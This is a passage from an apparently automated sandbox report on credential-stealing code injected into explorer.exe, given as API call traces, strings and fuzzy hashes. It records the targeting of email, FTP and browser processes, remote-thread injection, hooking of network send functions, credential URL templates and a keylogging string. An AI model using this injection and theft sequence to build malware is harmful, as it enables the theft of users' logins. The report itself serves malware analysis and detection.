lstrcmpiA.KERNEL32(?,thunderbird.exe), ref: 00C211CA
lstrcmpiA.KERNEL32(?,filezilla.exe), ref: 00C211DE
lstrcmpiA.KERNEL32(?,smartftp.exe), ref: 00C211F2
lstrcmpiA.KERNEL32(?,winscp.exe), ref: 00C21206
lstrcmpiA.KERNEL32(?,flashfxp.exe), ref: 00C21216
lstrcmpiA.KERNEL32(?,cuteftppro.exe), ref: 00C21226
lstrcmpiA.KERNEL32(?,mailmaster.exe), ref: 00C21236
lstrcmpiA.KERNEL32(?,263em.exe), ref: 00C21246
lstrcmpiA.KERNEL32(?,foxmail.exe), ref: 00C21256
lstrcmpiA.KERNEL32(?,alimail.exe), ref: 00C21266
lstrcmpiA.KERNEL32(?,mailchat.exe), ref: 00C21276
lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 00C212B4
Process32Next.KERNEL32(00000000,00000128), ref: 00C2130B
CloseHandle.KERNELBASE(00000000), ref: 00C2131C
Sleep.KERNELBASE(000003E8), ref: 00C21327

Strings

winscp.exe, xrefs: 00C211FC
thunderbird.exe, xrefs: 00C211C0
outlook.exe, xrefs: 00C21170
thebat32.exe, xrefs: 00C21198
thebat.exe, xrefs: 00C21184
flashfxp.exe, xrefs: 00C2120C
iexplore.exe, xrefs: 00C21124
filezilla.exe, xrefs: 00C211D4
microsoftedgecp.exe, xrefs: 00C210D2, 00C21160, 00C212AE
mailmaster.exe, xrefs: 00C2122C
foxmail.exe, xrefs: 00C2124C
thebat64.exe, xrefs: 00C211AC
chrome.exe, xrefs: 00C21138
cuteftppro.exe, xrefs: 00C2121C
263em.exe, xrefs: 00C2123C
smartftp.exe, xrefs: 00C211E8
opera.exe, xrefs: 00C2114C
alimail.exe, xrefs: 00C2125C
mailchat.exe, xrefs: 00C2126C
firefox.exe, xrefs: 00C21114

Memory Dump Source

Source File: 0000000E.00000002.3873767397.0000000000C21000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C21000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_c21000_explorer.jbxd

Yara matches

Similarity

API ID: lstrcmpi$HeapProcess32$AllocateCloseCreateFirstHandleNextProcessSleepSnapshotToolhelp32
String ID: 263em.exe$alimail.exe$chrome.exe$cuteftppro.exe$filezilla.exe$firefox.exe$flashfxp.exe$foxmail.exe$iexplore.exe$mailchat.exe$mailmaster.exe$microsoftedgecp.exe$opera.exe$outlook.exe$smartftp.exe$thebat.exe$thebat32.exe$thebat64.exe$thunderbird.exe$winscp.exe
API String ID: 3950187957-1680033604
Opcode ID: 0e21fba6563e14673dc3ddf13fe19e2d35e325a97b143a6a81f21f60bdd61dfa
Instruction ID: 64028a6a02217ffd82325364acc2583e0b92c1208574e4af34b684dfe4affa98
Opcode Fuzzy Hash: 0e21fba6563e14673dc3ddf13fe19e2d35e325a97b143a6a81f21f60bdd61dfa
Instruction Fuzzy Hash: 31518471604365E7CB10DBB1AC45F6E7AEC6F55780B480939FD50C2890EF78DB068A75

Function 00C27728 Relevance: 6.2, APIs: 4, Instructions: 204
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000E.00000002.3873767397.0000000000C26000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C26000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_c26000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cbdf56ac10bb8d2bfee7787c7b275714d5afce688ae6a4646722d8308be4eb92
Instruction ID: 2352527da8bcd7b69a8eee74440a900194c499003874738b7a8ab3c838787a6c
Opcode Fuzzy Hash: cbdf56ac10bb8d2bfee7787c7b275714d5afce688ae6a4646722d8308be4eb92
Instruction Fuzzy Hash: 1651387190C3A24FD7228A78ECC46B17BA0DB42720B290779C4F5CBBC6E7985D06C7A0

Function 00C22861 Relevance: 3.0, APIs: 2, Instructions: 6
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32(00000008,0000A000,00C210CC), ref: 00C22864
RtlAllocateHeap.NTDLL(00000000), ref: 00C2286B

Memory Dump Source

Source File: 0000000E.00000002.3873767397.0000000000C21000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C21000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_c21000_explorer.jbxd

Yara matches

Similarity

API ID: Heap$AllocateProcess
String ID:
API String ID: 1357844191-0
Opcode ID: 1994bb3dfae29d39ff30acffc74877060f0bb865adadc87a8d885bd794abe214
Instruction ID: a8172761295de82db33063f936ee60eac7c46721d92524b76be6dfb88815d38f
Opcode Fuzzy Hash: 1994bb3dfae29d39ff30acffc74877060f0bb865adadc87a8d885bd794abe214
Instruction Fuzzy Hash: 3FA012704201807FDD5017A0AC0DF0D3A19A740301F0000007209C44608978014D8735

Non-executed Functions

Function 00C21819 Relevance: 49.2, APIs: 23, Strings: 5, Instructions: 208
injectionnativesleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00C22608: VirtualQuery.KERNEL32(00C24434,?,0000001C), ref: 00C22615

OpenProcess.KERNEL32(001FFFFF,00000000,?,00000000,7556E800,microsoftedgecp.exe,?), ref: 00C2184E
NtSetInformationProcess.NTDLL(00000000,00000034,?), ref: 00C21889
NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 00C21919
RtlMoveMemory.NTDLL(00000000,00C23428,00000016), ref: 00C21940
RtlMoveMemory.NTDLL(-00000016,00000363), ref: 00C21968
NtUnmapViewOfSection.NTDLL(000000FF,-00000016), ref: 00C21978
CreateMutexA.KERNEL32(00000000,00000000,opera_shared_counter,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00C21992
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?,00000000), ref: 00C2199A
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 00C219A8
Sleep.KERNEL32(000003E8,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 00C219AF
GetModuleHandleA.KERNEL32(ntdll,atan,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 00C219C5
GetProcAddress.KERNEL32(00000000), ref: 00C219CC
ReadProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 00C219E2
WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 00C21A0C
CreateRemoteThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00C21A1F
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 00C21A26
Sleep.KERNEL32(000001F4,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 00C21A2D
WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 00C21A41
CreateRemoteThread.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00C21A58
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 00C21A65
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 00C21A6B
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 00C21A71
CloseHandle.KERNEL32(00000000,?,00000000), ref: 00C21A74

Strings

opera_shared_counter, xrefs: 00C2198B
0-FwP,Fw, xrefs: 00C21910
atan, xrefs: 00C219BB
ntdll, xrefs: 00C219C0
microsoftedgecp.exe, xrefs: 00C2181D

Memory Dump Source

Source File: 0000000E.00000002.3873767397.0000000000C21000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C21000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_c21000_explorer.jbxd

Yara matches

Similarity

API ID: Handle$Close$MemoryProcess$Create$MoveRemoteSectionSleepThreadUnmapViewWrite$AddressErrorInformationLastModuleMutexOpenProcQueryReadVirtual
String ID: 0-FwP,Fw$atan$microsoftedgecp.exe$ntdll$opera_shared_counter
API String ID: 1066286714-483016567
Opcode ID: a005a2237ea5a496f71cd07a057d58b853aba9f30f5ff2ef48949e75c10e8ac0
Instruction ID: afb63e241b6246a6b6cb852ae8e5e5ab3937bd1eb7c88d0b8e6ab7905aaaba6f
Opcode Fuzzy Hash: a005a2237ea5a496f71cd07a057d58b853aba9f30f5ff2ef48949e75c10e8ac0
Instruction Fuzzy Hash: 5F61AC71205354AFD320DF25AC88F6FBBECEF98750F040619F94992691DA74DE058BA2

Function 00C2263E Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 68
encryptionstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 00C2265A
CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 00C22672
lstrlen.KERNEL32(?,00000000), ref: 00C2267A
CryptHashData.ADVAPI32(?,?,00000000,?,00000000), ref: 00C22685
CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000,?,00000000,?,00000000), ref: 00C2269F
wsprintfA.USER32 ref: 00C226B6
CryptDestroyHash.ADVAPI32(?), ref: 00C226CF
CryptReleaseContext.ADVAPI32(?,00000000), ref: 00C226D9

Strings

%02X, xrefs: 00C226B0

Memory Dump Source

Source File: 0000000E.00000002.3873767397.0000000000C21000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C21000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_c21000_explorer.jbxd

Yara matches

Similarity

API ID: Crypt$Hash$Context$AcquireCreateDataDestroyParamReleaselstrlenwsprintf
String ID: %02X
API String ID: 3341110664-436463671
Opcode ID: abc5e0e10c85363eb3bbd61624909ffd55795ee71ac7bfef88b99182de320a7f
Instruction ID: b68a12a944bbfbacb72181ecee63df9634bfa0090a699be4c5e6abbdb20d3b7d
Opcode Fuzzy Hash: abc5e0e10c85363eb3bbd61624909ffd55795ee71ac7bfef88b99182de320a7f
Instruction Fuzzy Hash: FF112B72A00148BFDB219B99EC88FAEBFBCEB44741F104065F605E2550DA794F169B70

Function 00C21B17 Relevance: 6.1, APIs: 4, Instructions: 101
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlMoveMemory.NTDLL(?,?,?), ref: 00C21B4E
LoadLibraryA.KERNEL32(?,00C24434,00000000,00000000,75572EE0,00000000,00C21910,?,?,?,00000001,?,00000000), ref: 00C21B76
GetProcAddress.KERNEL32(00000000,-00000002), ref: 00C21BA3
LdrProcessRelocationBlock.NTDLL(?,?,00000008,?), ref: 00C21BF4

Memory Dump Source

Source File: 0000000E.00000002.3873767397.0000000000C21000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C21000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_c21000_explorer.jbxd

Yara matches

Similarity

API ID: AddressBlockLibraryLoadMemoryMoveProcProcessRelocation
String ID:
API String ID: 3827878703-0
Opcode ID: a5351494bb1b39d8fec55bc27e7b9cc218947aa480361e81f6433d662ce63254
Instruction ID: dfb42a37622de5fc850b577f13edaf58b6fa10855e3b86f6ae6767c7f4e5594d
Opcode Fuzzy Hash: a5351494bb1b39d8fec55bc27e7b9cc218947aa480361e81f6433d662ce63254
Instruction Fuzzy Hash: EA31A175700225AFCB24CF29D884B76B7E8EF25315B18456CEC96C7A00EB35E946CBA0

Function 00C21332 Relevance: 26.3, APIs: 11, Strings: 4, Instructions: 94
libraryloadersleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00C22861: GetProcessHeap.KERNEL32(00000008,0000A000,00C210CC), ref: 00C22864
Part of subcall function 00C22861: RtlAllocateHeap.NTDLL(00000000), ref: 00C2286B

GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,?,?,00C2109E,?,00C21010), ref: 00C2134A
GetCurrentProcessId.KERNEL32(00000003,?,00C2109E,?,00C21010), ref: 00C2135B
wsprintfA.USER32 ref: 00C21372

Part of subcall function 00C2263E: CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 00C2265A
Part of subcall function 00C2263E: CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 00C22672
Part of subcall function 00C2263E: lstrlen.KERNEL32(?,00000000), ref: 00C2267A
Part of subcall function 00C2263E: CryptHashData.ADVAPI32(?,?,00000000,?,00000000), ref: 00C22685
Part of subcall function 00C2263E: CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000,?,00000000,?,00000000), ref: 00C2269F
Part of subcall function 00C2263E: wsprintfA.USER32 ref: 00C226B6
Part of subcall function 00C2263E: CryptDestroyHash.ADVAPI32(?), ref: 00C226CF
Part of subcall function 00C2263E: CryptReleaseContext.ADVAPI32(?,00000000), ref: 00C226D9

CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 00C21389
GetLastError.KERNEL32 ref: 00C2138F
Sleep.KERNEL32(000001F4), ref: 00C213A1

Part of subcall function 00C224D5: GetCurrentProcessId.KERNEL32 ref: 00C224E7
Part of subcall function 00C224D5: GetCurrentThreadId.KERNEL32 ref: 00C224EF
Part of subcall function 00C224D5: CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 00C224FF
Part of subcall function 00C224D5: Thread32First.KERNEL32(00000000,0000001C), ref: 00C2250D
Part of subcall function 00C224D5: CloseHandle.KERNEL32(00000000), ref: 00C22566

GetModuleHandleA.KERNEL32(ws2_32.dll,send), ref: 00C213B8
GetProcAddress.KERNEL32(00000000), ref: 00C213BF
GetModuleHandleA.KERNEL32(ws2_32.dll,WSASend), ref: 00C213E4
GetProcAddress.KERNEL32(00000000), ref: 00C213EB

Part of subcall function 00C21DE3: RtlMoveMemory.NTDLL(00000000,00000000,00000000), ref: 00C21E1D

RtlExitUserThread.NTDLL(00000000), ref: 00C2141D

Strings

%s%d%d%d, xrefs: 00C2136C
ws2_32.dll, xrefs: 00C213B3, 00C213DF
WSASend, xrefs: 00C213DA
send, xrefs: 00C213AE

Memory Dump Source

Source File: 0000000E.00000002.3873767397.0000000000C21000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C21000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_c21000_explorer.jbxd

Yara matches

Similarity

API ID: Crypt$Hash$CreateCurrentHandleModuleProcess$AddressContextHeapProcThreadwsprintf$AcquireAllocateCloseDataDestroyErrorExitFileFirstLastMemoryMoveMutexNameParamReleaseSleepSnapshotThread32Toolhelp32Userlstrlen
String ID: %s%d%d%d$WSASend$send$ws2_32.dll
API String ID: 706757162-1430290102
Opcode ID: 9e0eebb2310cd63c092847d9eb3ae64b358d47b0da066f7ed9d03b3bab682adc
Instruction ID: a840bec1613e5a7ced4326a881aef58bbd3e8ecbcf43048450541e4c7d7eb3e1
Opcode Fuzzy Hash: 9e0eebb2310cd63c092847d9eb3ae64b358d47b0da066f7ed9d03b3bab682adc
Instruction Fuzzy Hash: 78318631340274BBCB257FA0FC0AF6E3B55AF55B01F044024FA0996DA1CFB98A129BA0

Function 00C21647 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 91
stringnetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlen.KERNEL32(00C24220,?,?), ref: 00C21679
lstrlen.KERNEL32(?), ref: 00C21686
getpeername.WS2_32(?,?,?), ref: 00C216A0
inet_ntoa.WS2_32(?), ref: 00C216B1
htons.WS2_32(?), ref: 00C216BF
wsprintfA.USER32 ref: 00C21725

Strings

imap://%s:%s@%s:%d, xrefs: 00C216FA
pop3://%s:%s@%s:%d, xrefs: 00C21701
smtp://%s:%s@%s:%d, xrefs: 00C216F3, 00C21723
ftp://%s:%s@%s:%d, xrefs: 00C21708

Memory Dump Source

Source File: 0000000E.00000002.3873767397.0000000000C21000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C21000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_c21000_explorer.jbxd

Yara matches

Similarity

API ID: lstrlen$getpeernamehtonsinet_ntoawsprintf
String ID: ftp://%s:%s@%s:%d$imap://%s:%s@%s:%d$pop3://%s:%s@%s:%d$smtp://%s:%s@%s:%d
API String ID: 3379139566-1703351401
Opcode ID: 2a8eb82c419638ac0ef5da0e02a193bcfd7cff4dcce6a497404b380e645faf53
Instruction ID: ceda50a2fd966d8eabe7ef2320d1c0ddb87298ddf1b2f3a7d11c48ba808cf43b
Opcode Fuzzy Hash: 2a8eb82c419638ac0ef5da0e02a193bcfd7cff4dcce6a497404b380e645faf53
Instruction Fuzzy Hash: 8F21FC32E00269ABDF105EBEAC4467E7AB99BA5701B0C4075EC14D3D11CA75CF019B60

Function 00C21752 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(ntdll.dll,sscanf,?,?,?,00C21539,?,?,?,00C2144B,?), ref: 00C21763
GetProcAddress.KERNEL32(00000000), ref: 00C2176A
RtlZeroMemory.NTDLL(00C24228,00000104), ref: 00C21788
RtlZeroMemory.NTDLL(00C24118,00000104), ref: 00C21790
RtlZeroMemory.NTDLL(00C24330,00000104), ref: 00C21798
RtlZeroMemory.NTDLL(00C24000,00000104), ref: 00C217A1

Strings

sscanf, xrefs: 00C21755
ntdll.dll, xrefs: 00C2175A
%s%s%s%s, xrefs: 00C217B3

Memory Dump Source

Source File: 0000000E.00000002.3873767397.0000000000C21000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C21000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_c21000_explorer.jbxd

Yara matches

Similarity

API ID: MemoryZero$AddressHandleModuleProc
String ID: %s%s%s%s$ntdll.dll$sscanf
API String ID: 1490332519-278825019
Opcode ID: 56c881c4bf3434043495e856d810179040e445c8e2ab6551da34d8e6366e16dc
Instruction ID: 59a5cd7d976efedc666b75baf6621596c1044608c495764edb6d829c11afe0c2
Opcode Fuzzy Hash: 56c881c4bf3434043495e856d810179040e445c8e2ab6551da34d8e6366e16dc
Instruction Fuzzy Hash: 2AF0AE72B8037CB3823463AB7C06E4FBD5CC591FE63030171BA0463D41CC9969014AF4

Function 00C224D5 Relevance: 15.1, APIs: 10, Instructions: 51
threadprocessinjectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcessId.KERNEL32 ref: 00C224E7
GetCurrentThreadId.KERNEL32 ref: 00C224EF
CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 00C224FF
Thread32First.KERNEL32(00000000,0000001C), ref: 00C2250D
OpenThread.KERNEL32(001FFFFF,00000000,?), ref: 00C2252C
SuspendThread.KERNEL32(00000000), ref: 00C2253C
CloseHandle.KERNEL32(00000000), ref: 00C2254B
Thread32Next.KERNEL32(00000000,0000001C), ref: 00C2255B
CloseHandle.KERNEL32(00000000), ref: 00C22566

Memory Dump Source

Source File: 0000000E.00000002.3873767397.0000000000C21000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C21000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_c21000_explorer.jbxd

Yara matches

Similarity

API ID: Thread$CloseCurrentHandleThread32$CreateFirstNextOpenProcessSnapshotSuspendToolhelp32
String ID:
API String ID: 1467098526-0
Opcode ID: c745d2d52ff348dd6c2a4de76d02f70ad0dec472ce299c3be9f0d45a042c6046
Instruction ID: 6764e6dadac09c646a1577e7407b13668aab31cdc6d158160d37db14f823407d
Opcode Fuzzy Hash: c745d2d52ff348dd6c2a4de76d02f70ad0dec472ce299c3be9f0d45a042c6046
Instruction Fuzzy Hash: 43118E71514290EFD7209F60AC0CB6EBFA8FF85B01F004529FA4192550D7388A0A9BB2

Function 00C21F4A Relevance: 14.3, APIs: 4, Strings: 4, Instructions: 283
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00C22861: GetProcessHeap.KERNEL32(00000008,0000A000,00C210CC), ref: 00C22864
Part of subcall function 00C22861: RtlAllocateHeap.NTDLL(00000000), ref: 00C2286B

Part of subcall function 00C227E2: lstrlen.KERNEL32(00C240DA,?,00000000,00000000,00C21F86,75568A60,00C240DA,00000000), ref: 00C227EA
Part of subcall function 00C227E2: MultiByteToWideChar.KERNEL32(00000000,00000000,00C240DA,00000001,00000000,00000000), ref: 00C227FC

Part of subcall function 00C22374: RtlZeroMemory.NTDLL(?,00000018), ref: 00C22386

RtlZeroMemory.NTDLL(?,0000003C), ref: 00C21FE2
wsprintfW.USER32 ref: 00C2211B
wsprintfW.USER32 ref: 00C22186
RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 00C22250

Strings

Host: %s, xrefs: 00C22180
Accept: */*Referer: %S, xrefs: 00C22111
Content-Type: application/x-www-form-urlencoded, xrefs: 00C221AA
POST, xrefs: 00C220CC

Memory Dump Source

Source File: 0000000E.00000002.3873767397.0000000000C21000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C21000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_c21000_explorer.jbxd

Yara matches

Similarity

API ID: Memory$HeapZerowsprintf$AllocateByteCharMoveMultiProcessWidelstrlen
String ID: Accept: */*Referer: %S$Content-Type: application/x-www-form-urlencoded$Host: %s$POST
API String ID: 4204651544-1701262698
Opcode ID: 2402b40b359f5aa3c9f51bd53438d7493f6e3de9b0c44b6d2f84301b768bc1de
Instruction ID: 40a2b05af5a5d3e9ce8a8f0a009c1d28a033099aa82b1eb355e785e666748d98
Opcode Fuzzy Hash: 2402b40b359f5aa3c9f51bd53438d7493f6e3de9b0c44b6d2f84301b768bc1de
Instruction Fuzzy Hash: 49A16971608351AFD3209F68E885B2FBBE8EB88350F10082DF995D3661DA75DE058B62

Function 00C225AD Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OpenProcess.KERNEL32(00000400,00000000,?,7556E800,?,?,microsoftedgecp.exe,00C21287), ref: 00C225BF
IsWow64Process.KERNEL32(000000FF,?), ref: 00C225D1
IsWow64Process.KERNEL32(00000000,?), ref: 00C225E4
CloseHandle.KERNEL32(00000000), ref: 00C225FA

Strings

microsoftedgecp.exe, xrefs: 00C225AD

Memory Dump Source

Source File: 0000000E.00000002.3873767397.0000000000C21000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C21000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_c21000_explorer.jbxd

Yara matches

Similarity

API ID: Process$Wow64$CloseHandleOpen
String ID: microsoftedgecp.exe
API String ID: 331459951-1475183003
Opcode ID: 9fb0f6dfbff2fc317cb828abb5a0d862c2738ff9c056d081aec0957616a9bc4f
Instruction ID: 8045b6754d1609264a40eeba23dee0cb00ab85e681334920c42c8c1631affa40
Opcode Fuzzy Hash: 9fb0f6dfbff2fc317cb828abb5a0d862c2738ff9c056d081aec0957616a9bc4f
Instruction Fuzzy Hash: 2CF0B47291226CFF9B30CF90AD88AEEB76CEF01351B14426AF91092540D7354F05E6B0

Analysis Process: explorer.exePID: 7144, Parent PID: 4084COMMON

Execution Graph

Execution Coverage:	8.2%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	9
Total number of Limit Nodes:	2

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 0035355C Relevance: 1.6, APIs: 1, Instructions: 73
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtUnmapViewOfSection.NTDLL ref: 003535D8

Memory Dump Source

Source File: 0000000F.00000002.3873306436.0000000000351000.00000040.80000000.00040000.00000000.sdmp, Offset: 00351000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_351000_explorer.jbxd

Yara matches

Similarity

API ID: SectionUnmapView
String ID:
API String ID: 498011366-0
Opcode ID: 105ce7ebc966886b9a25723169f2257f301d4275c672492e635fc8e478682f43
Instruction ID: 6dd68fa012ac581c1483df5f7fd873147cb85a74b6b53a498646e1917687239d
Opcode Fuzzy Hash: 105ce7ebc966886b9a25723169f2257f301d4275c672492e635fc8e478682f43
Instruction Fuzzy Hash: 0B11C430615E095FEB59BBB8989DB7937A0EB15303F54052AAC1ACB6B1EB398A44C701

Function 00353220 Relevance: 7.7, APIs: 5, Instructions: 241
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00353266
Process32First.KERNEL32 ref: 00353289
Process32Next.KERNEL32 ref: 00353532
CloseHandle.KERNELBASE ref: 00353543
SleepEx.KERNELBASE ref: 0035354E

Memory Dump Source

Source File: 0000000F.00000002.3873306436.0000000000351000.00000040.80000000.00040000.00000000.sdmp, Offset: 00351000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_351000_explorer.jbxd

Yara matches

Similarity

API ID: Process32$CloseCreateFirstHandleNextSleepSnapshotToolhelp32
String ID:
API String ID: 2482764027-0
Opcode ID: dd7379c30c01fbe83c455f487028ed93214d04d4b8b4672215a43173641bdad8
Instruction ID: e7b3e5bed0e63463666c6a80763a507e543cd786837986f320a2fb85aad2b0eb
Opcode Fuzzy Hash: dd7379c30c01fbe83c455f487028ed93214d04d4b8b4672215a43173641bdad8
Instruction Fuzzy Hash: 528121312186088FE717EF55EC58FEAB7A5FB51781F45462AA842C7170EF78DA08CB81

Function 0035A048 Relevance: 4.7, APIs: 3, Instructions: 223
memorylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE ref: 0035A147
VirtualProtect.KERNELBASE(?,?,?,?,?,?,?,-0000000E), ref: 0035A1BB
VirtualProtect.KERNELBASE ref: 0035A1D9

Memory Dump Source

Source File: 0000000F.00000002.3873306436.0000000000357000.00000040.80000000.00040000.00000000.sdmp, Offset: 00357000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_357000_explorer.jbxd

Similarity

API ID: ProtectVirtual$LibraryLoad
String ID:
API String ID: 895956442-0
Opcode ID: 9471cbd89cfacdc20873a06991d91791c754b160c08a2600c3720216ed5fc549
Instruction ID: 67830443a64c6c07018f6b4160dbcb7b6984e1c351857914a76bdd7db32a2294
Opcode Fuzzy Hash: 9471cbd89cfacdc20873a06991d91791c754b160c08a2600c3720216ed5fc549
Instruction Fuzzy Hash: 45517D31368D1D0BCB26AA3C9CC4AB5B7C1F755327F14072AD88AC32E5D559D94EA383

Analysis Process: explorer.exePID: 6784, Parent PID: 4084COMMON

Execution Graph

Execution Coverage:	9.6%
Dynamic/Decrypted Code Coverage:	97.5%
Signature Coverage:	17.7%
Total number of Nodes:	322
Total number of Limit Nodes:	4

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 00AD1016 Relevance: 35.2, APIs: 14, Strings: 6, Instructions: 193
stringsleepprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00AD2724: VirtualQuery.KERNEL32(00000000,?,0000001C,?,?,?,00000000,00AD29F3,-00000001,00AD128C), ref: 00AD2731

Part of subcall function 00AD2A09: GetProcessHeap.KERNEL32(00000008,0000A000,00AD10BF), ref: 00AD2A0C
Part of subcall function 00AD2A09: RtlAllocateHeap.NTDLL(00000000), ref: 00AD2A13

RtlMoveMemory.NTDLL(00000000,?,00000363), ref: 00AD1038
RtlMoveMemory.NTDLL(00000000,?,?), ref: 00AD106C
NtUnmapViewOfSection.NTDLL(000000FF,?), ref: 00AD1075
GetCurrentProcessId.KERNEL32(?,00AD1010), ref: 00AD107B
wsprintfA.USER32 ref: 00AD10E7
RtlMoveMemory.NTDLL(00000000,0000000C,-00000001), ref: 00AD1155
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00AD1160
Process32First.KERNEL32(00000000,?), ref: 00AD117F
CharLowerA.USER32(?), ref: 00AD1199
lstrcmpiA.KERNEL32(?,explorer.exe), ref: 00AD11B5
lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 00AD1212
Process32Next.KERNEL32(00000000,00000128), ref: 00AD126C
CloseHandle.KERNEL32(00000000), ref: 00AD127F
Sleep.KERNELBASE(000003E8), ref: 00AD129F

Strings

0-FwP,Fw, xrefs: 00AD1075
microsoftedgecp.exe, xrefs: 00AD1208
keylog_rules=, xrefs: 00AD110D
explorer.exe, xrefs: 00AD11AB
%s%s, xrefs: 00AD10E1
|:|, xrefs: 00AD1125

Memory Dump Source

Source File: 00000010.00000002.3873768309.0000000000AD1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AD1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_ad1000_explorer.jbxd

Similarity

API ID: MemoryMove$HeapProcessProcess32lstrcmpi$AllocateCharCloseCreateCurrentFirstHandleLowerNextQuerySectionSleepSnapshotToolhelp32UnmapViewVirtualwsprintf
String ID: %s%s$0-FwP,Fw$explorer.exe$keylog_rules=$microsoftedgecp.exe$|:|
API String ID: 3206029838-540694534
Opcode ID: 8f27d9a442bf1b3d7ef7e5a88c7efb42d3a0d324831a8cadc4b35c57cdb355ad
Instruction ID: 970c921788df6eb60dd3f0247392b6be311efbb2cd8d4cb0d89a0c5702585963
Opcode Fuzzy Hash: 8f27d9a442bf1b3d7ef7e5a88c7efb42d3a0d324831a8cadc4b35c57cdb355ad
